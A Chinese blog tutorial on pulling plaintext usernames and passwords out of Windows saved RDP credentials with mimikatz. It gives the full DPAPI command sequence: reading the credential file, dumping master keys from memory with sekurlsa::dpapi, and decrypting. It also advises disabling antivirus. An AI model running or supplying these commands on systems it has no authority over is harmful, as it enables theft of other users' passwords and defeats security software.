首页 > 其他分享 >RDP远程桌面凭证获取密码

RDP远程桌面凭证获取密码

时间:2023-07-12 10:56:22浏览次数:45  
标签:exe 凭证 RDP 78F88D66269E4A4100E35E1A9C3F8266 mimikatz 远程桌面 debug guidMasterKey

参考链接:https://blog.csdn.net/qq_36618918/article/details/130677478
使用的工具:mimikatz

前言

该方式适用于获取系统存储的凭证中的用户名和密码,不仅限于远程桌面的凭证。

使用的工具是mimikatz,杀软会报毒拦截,下载及使用的时候可以推出杀软
下载地址:https://gitcode.net/mirrors/gentilkiwi/mimikatz/-/release

操作

  1. 打开系统目录查看有哪些凭证文件

    记录下要操作的文件名:78F88D66269E4A4100E35E1A9C3F8266
  2. 获取guidMasterKey
    进入到mimikatz.exe的目录,执行
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\78F88D66269E4A4100E35E1A9C3F8266" exit

其中C:\Users\Administrator\AppData\Local\Microsoft\Credentials\78F88D66269E4A4100E35E1A9C3F8266替换为自己的

复制出其中的guidMasterKey db374c7f-b7fb-4a36-b954-893ca6ef2ade
3. 根据guidMasterKey找到对应Masterkey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit > 1.txt

执行后会在mimikatz目录生成1.txt文件,在其中查找上面获得的guidMasterKey内容,然后复制出Masterkey

4. 解密获取明文

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\78F88D66269E4A4100E35E1A9C3F8266 /masterkey:ec313e2dbc25445cb392dc6e00696b0c3614e52915599b68857e4c50384373a9baa8043f9135d55543b431a1002225322d2b486cb3659c5ef20379d08a852a59" exit

使用上面的文件名和获得的Masterkey替换上面命令中的部分,执行后可以看到用户名和密码

标签:exe,凭证,RDP,78F88D66269E4A4100E35E1A9C3F8266,mimikatz,远程桌面,debug,guidMasterKey
From: https://www.cnblogs.com/fortuneju/p/17546950.html

相关文章

  • 20230709 - 一句SQL更新WordPress管理员密码
    该方法适用于有wordpress数据库权限,但忘记了管理员密码的情况UPDATEwp_usersSETuser_pass=MD5('new_password')WHEREwp_users.user_login='admin_username';更新时,密码为MD5加密字符串,此时可以使用new_password登录,登录后,WordPress会自动更新密码为新加密字符格式。......
  • Wordpress:如何更改Elementor绑定的网站?
    在使用Wordpress做网站的过程中,需要用到Elementor付费版进行优化网站,一般是绑定一个网站后,要想新建另一个网站,基础版不支持多个绑定,那么如何进行改绑呢?1.进入Elementor后台,选择Subscriptions >>>选择已绑定的项,点击右下角ManageThissubscription  2.点击网站后面的锁......
  • 关于通过bat脚本-自动使用mstsc-远程桌面命令登录到远程windows主机的方法
    在Windows系统中,我们可以通过系统自带的mstsc远程桌面工具,登录到远端的windows服务器主机但是需要输入用户名和密码,回车、于是笔者想了一下,能不能创建一个bat文件,双击后,就会自动的传入用户名和密码进行登录经过查询和实验、还真有这样的办法(当然在正式的环境,不建议这样操作,因为......
  • 网安周报|黑客利用未修补的WordPress插件缺陷来创建秘密管理员帐户
    网安周报是棱镜七彩推出的安全资讯专栏,旨在通过展示一周内发生的与开源安全、软件供应链安全相关攻击事件,让用户了解开源及软件供应链威胁,提高对安全的重视,做好防御措施。1、黑客利用未修补的WordPress插件缺陷来创建秘密管理员帐户来百度APP畅享高清图片终极会员插件中未修补的关......
  • WordPress主题,当前页面使用了哪个template模板文件?
    对于页面与模板的对应情况一般都是能确定的,不过新朋友一时不熟悉可能还是需要花一点时间。其实,可以有一个小技巧,可以快速确定当前页面对应的模板文件。想要实现上面的效果,只需将下面代码加入主题的 functions.php 文件。functionzhuige_admin_bar_init(){//Ifnota......
  • Wordpress:安装Astra主题后,无法找到主题模板?
    在使用Wordpress安装Astra后,发现侧栏Appearance没有出现StarterTemplates,这样就无法使用很多Astra相关的免费模板,如何解决?1.点击Plugins,在搜索框输入StarterTemplates,安装后激活 2.在Appearance找到StarterTemplates,进入即可选择喜欢的模板。 ......
  • windows 远程桌面连接(mstsc) 删除历史记录
    删除下拉框的记录进入注册表编辑:win+R>regedit按HKEY_CURRENT_USER\Software\Microsoft\TerminalServerClient\Default的路径,删除除了“默认外的”,所有“MRU+数字”的项。删除输入框的默认填充打开当前用户的主文件夹>我的文档(MyDocuments),点选工具栏组织>查看找到隐藏文件和......
  • Wordpress:siteground下如何提高wordpress网站的加载速度?
    网页加速一般有这几个步骤:1.合并代码(多个js合并成一个,多个css合并成一个)2.优化代码结构(尽量使用Html,尽量不要使用js渲染,尽量将js放置在body尾标之后)3.压缩文件(包括压缩代码、压缩图片、压缩视频)4.使用CDN分发内容5.网页静态化(将经常要访问的网页,做成静态文件html)6.使用缓存(......
  • 关于Java RDP协议实现远程桌面连接的开源项目properjavardp
    最近想学一下在Android平台上实现RDP协议远程连接PC,于是在网上找这方面的资料,发现了一个开源的JavaRDP项目,很不错,拿出来和大家分享一下。关于properjavardp的一些说明,可以到这里看看:http://properjavardp.sourceforge.net/ 。1、首先到http://sourceforge.net/projects/properjav......
  • CentOS7安装xrdp(Windows远程桌面连接Linux)
    前提:CentOS安装桌面,如果无桌面,请执行:yum-ygroupsinstall"GNOMEDesktop"startx方法一配置源yuminstallepel*-y安装xrdpyum--enablerepo=epel-yinstallxrdp 方法二1、安装xrdp更具自己的系统位数选择对应的包(如果是32位使用则选择i386,如果是64位,请选择x86_64),查......